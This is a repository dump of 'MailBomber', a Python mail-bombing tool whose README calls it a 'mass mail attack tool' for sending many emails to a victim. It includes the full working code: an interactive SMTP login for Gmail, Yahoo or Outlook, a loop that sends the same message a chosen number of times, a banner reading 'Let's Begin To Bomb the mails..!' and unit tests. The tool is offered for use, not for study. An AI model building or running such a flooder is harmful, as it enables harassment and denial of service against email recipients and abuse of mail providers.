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") 14 | message = input("Enter the message that you want to mail:\n") 15 | times = int(input("How many times do you want to send mail ? ")) 16 | 17 | return MailBomb(recip_mail, times, message) 18 | 19 | 20 | def get_smtp_server_and_port(server): 21 | 22 | 23 | select_smtp = { 24 | "gmail" : "smtp.gmail.com", 25 | "yahoo" : "smtp.mail.yahoo.com", 26 | "outlook" : "smtp.live.com" 27 | } 28 | 29 | select_port = { 30 | "yahoo" : 465 31 | } 32 | 33 | smtp_server = select_smtp.get(server) or ValueError('SMTP server and port not available') 34 | port = select_port.get(server) or ValueError('SMTP server and port not available') 35 | 36 | if server == "gmail": 37 | smtp_server = "smtp.gmail.com" 38 | port = 587 39 | elif server == "yahoo": 40 | smtp_server = "smtp.mail.yahoo.com" 41 | port = 465 42 | elif server == "outlook": 43 | smtp_server = "smtp.live.com" 44 | else: 45 | raise ValueError('SMTP server and port not available') 46 | 47 | return smtp_server, port 48 | 49 | 50 | def get_email_client(smtp_server, port): 51 | smtpobj = smtplib.SMTP(smtp_server, port) 52 | smtpobj.ehlo() 53 | return smtpobj 54 | 55 | 56 | def mass(): 57 | try: 58 | server = input("Server Mail:") 59 | smtp_server, port = get_smtp_server_and_port(server) 60 | smtpobj = get_email_client(smtp_server, port) 61 | mail_client = MailClient(smtpobj) 62 | mail_client.enable_email_encryption(smtp_server) 63 | 64 | mail_bomb_request = get_mail_bomb_input() 65 | mail_client.send_email_bomb(mail_bomb_request) 66 | except ValueError as err: 67 | print(err) 68 | 69 | 70 | if __name__ == '__main__': 71 | mass() 72 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MaiBomber - Mass Mail Attack tool 2 | MailBomber is one of the easiest & simple tool in python which basically works on **mass mail attack** to send multiple mails to victim.It is inspired by **Mass mail attack vector** in **kali linux** **Setoolkit(Social engineering tool)**.It is designed with smtplib library. 3 | ![Alt Text](https://thepracticaldev.s3.amazonaws.com/i/643lrt9ndql9z9yxemn2.png) 4 | ## Vision 5 | #### print("Just to contribute & help hacking community") 6 | #### print("Helps to understand the power of python") 7 | ![Alt Text](https://thepracticaldev.s3.amazonaws.com/i/h687z3g246dpbr0szgxx.png) 8 | ![Alt Text](https://thepracticaldev.s3.amazonaws.com/i/61h8fpmgy5imfs25d7xp.png) 9 | 10 | 11 | ## Contribution 12 | If you want to contribute to this super amazing tool , So You can contribute in following ways: 13 | 14 | - Report bugs 15 | - Add some code 16 | - Give suggestions to make it better 17 | - Fix issues & submit a pull request 18 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-architect -------------------------------------------------------------------------------- /contribution.md: -------------------------------------------------------------------------------- 1 | # contribution 2 | MailBomber is a python based tool for mass mailing script in gmail accounts you can contribute your codes & report bugs in this tool with the following steps: 3 | 4 | # How to contribute! 5 | ## Steps: 6 | * fork the repository 7 | * Clone the fork repo (git clone https://github.com/ankitdobhal/Python-Scripts) 8 | * Create new branch (git checkout -b ) 9 | * Add files in scripts folder (git add ) 10 | * Add a commit message ! (git commit -a -m "") 11 | * Push changes (git push origin) 12 | * Create pull requests 13 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pytest==5.2.0 -------------------------------------------------------------------------------- /src/mail_bomb.py: -------------------------------------------------------------------------------- 1 | class MailBomb(): 2 | def __init__(self, recipient, times, message): 3 | self.recipient = recipient 4 | self.times = times 5 | self.message = message 6 | -------------------------------------------------------------------------------- /src/mail_client.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | import time 3 | import getpass 4 | from src.mail_bomb import MailBomb 5 | 6 | 7 | class MailClient: 8 | def __init__(self, smtpobj): 9 | self.smtpobj = smtpobj 10 | self.email = None 11 | self.login() 12 | 13 | 14 | def login(self): 15 | # smtpobj is a SMTP object that represents a connection to an SMTP mail server and has methods for sending emails. 16 | self.email = input("What is your email address ? ") # take username or input 17 | my_passw = getpass.getpass('Enter your password:') 18 | try: 19 | self.smtpobj.login(self.email, my_passw) 20 | self.email = self.email 21 | except smtplib.SMTPAuthenticationError: 22 | print("The username or password you entered is incorrect.") 23 | 24 | def enable_email_encryption(self, smtp_server): 25 | if smtp_server == "smtp.gmail.com": 26 | self.smtpobj.starttls() # This step enables encryption(TLS Encryption) for your connection. 27 | 28 | def send_email_bomb(self, mail_bomb: MailBomb): 29 | try: 30 | for i in range(mail_bomb.times): 31 | self.smtpobj.sendmail(self.email, mail_bomb.recipient, mail_bomb.message) 32 | time.sleep(1) 33 | print(f"Message sent {i + 1} times") 34 | except Exception as e: 35 | print(f"Failed to send: {e}") 36 | -------------------------------------------------------------------------------- /src/utils/util.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | 3 | 4 | def get_ascii_header(): 5 | RED = '\033[31m' 6 | END = '\033[0m' 7 | ascii_art = RED \ 8 | + """ 9 | ______ _______ ____ ____ ____ _____ _____ ______ _______ _____ ______ _____ 10 | | \/ \ ____|\ \ | || | ___|\ \ ____|\ \ | \/ \ ___|\ \ ___|\ \ ___|\ \ 11 | / /\ \ / /\ \ | || | | |\ \ / /\ \ / /\ \ | |\ \ | \ \ | |\ \ 12 | / /\ / /\ || | | || || | | | | |/ / \ \ / /\ / /\ || | | || ,_____/|| | | | 13 | / /\ \_/ / / /|| |__| || || | ____ | | /_ _ /| | | | / /\ \_/ / / /|| | /_ _ / | \--'\_|/| |/____/ 14 | | | \|_|/ / / || .--. || || | | || |\ \ | | | || | \|_|/ / / || |\ \ | /___/| | |\ \ 15 | | | | | || | | || || | | || | | ||\ \ / /|| | | | || | | | | \____|\ | | | | 16 | |\____\ |____| /|____| |____||____||____|/____/||____|/____/|| \_____\/____/ ||\____\ |____| /|____|/____/| |____ ' /||____| |____| 17 | | | | | | / | | | || || | ||| / || \ | || | /| | | | | / | / || | /_____/ || | | | 18 | \|____| |____|/ |____| |____||____||____|_____|/|____|_____|/ \|____||____|/ \|____| |____|/ |____|_____|/ |____| | /|____| |____| 19 | \( )/ \( )/ \( \( )/ \( )/ \( )/ \( )/ \( )/ \( |_____|/ \( )/ 20 | ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' )/ ' ' 21 | ' 22 | [++] MailBomber is a mass mailer script or tool [++] 23 | Coded By: Ankit Dobhal 24 | Let's Begin To Bomb the mails..! 25 | ------------------------------------------------------------------------------------------------------------------------------------------------------- 26 | MailBomber version 1.0 27 | """ \ 28 | + END 29 | 30 | return ascii_art -------------------------------------------------------------------------------- /tests/mail_client_test.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | from unittest import mock 3 | 4 | from src.mail_bomb import MailBomb 5 | from src.mail_client import MailClient 6 | 7 | FAKE_USER = "fake_user" 8 | 9 | 10 | class MailClientTest(unittest.TestCase): 11 | 12 | @mock.patch('builtins.input', return_value=FAKE_USER) 13 | @mock.patch('src.mail_client.getpass') 14 | @mock.patch("src.mail_client.smtplib") 15 | def test_login_calls_login_with_email_password(self, mock_smtplib: mock.Mock, 16 | mock_get_pass: mock.Mock, 17 | mock_input: mock.Mock): 18 | mock_get_pass.getpass.return_value = "fake_pass" 19 | 20 | MailClient(mock_smtplib).login() 21 | 22 | mock_smtplib.login.assert_called_with(FAKE_USER, "fake_pass") 23 | 24 | @mock.patch('builtins.input', return_value="yes") 25 | @mock.patch('src.mail_client.getpass') 26 | @mock.patch("src.mail_client.smtplib") 27 | def test_enable_email_encryption_calls_starttls(self, mock_smtplib: mock.Mock, 28 | mock_get_pass: mock.Mock, 29 | mock_input: mock.Mock): 30 | mock_get_pass.getpass.return_value = "fake_pass" 31 | 32 | MailClient(mock_smtplib).enable_email_encryption("smtp.gmail.com") 33 | 34 | mock_smtplib.starttls.assert_called() 35 | 36 | @mock.patch('builtins.input', return_value=FAKE_USER) 37 | @mock.patch('src.mail_client.getpass') 38 | @mock.patch("src.mail_client.smtplib") 39 | def test_enable_email_encryption_when_not_gmail_does_not_call_starttls(self, mock_smtplib: mock.Mock, 40 | mock_get_pass: mock.Mock, 41 | mock_input: mock.Mock): 42 | mock_get_pass.getpass.return_value = "fake_pass" 43 | 44 | MailClient(mock_smtplib).enable_email_encryption("smtp.yahoo.com") 45 | 46 | mock_smtplib.starttls.assert_not_called() 47 | 48 | @mock.patch('builtins.input', return_value=FAKE_USER) 49 | @mock.patch('src.mail_client.getpass') 50 | @mock.patch("src.mail_client.smtplib") 51 | @mock.patch("src.mail_client.time") 52 | def test_send_email_bomb_sends_emails(self, 53 | mock_time: mock.Mock, # for time convenience 54 | mock_smtplib: mock.Mock, 55 | mock_get_pass: mock.Mock, 56 | mock_input: mock.Mock): 57 | mock_get_pass.getpass.return_value = "fake_pass" 58 | request = MailBomb("my_mom", 10, "sorry mom sorry") 59 | 60 | MailClient(mock_smtplib).send_email_bomb(request) 61 | 62 | assert mock_smtplib.sendmail.call_count == request.times 63 | mock_smtplib.sendmail.assert_called_with(FAKE_USER, request.recipient, request.message) 64 | --------------------------------------------------------------------------------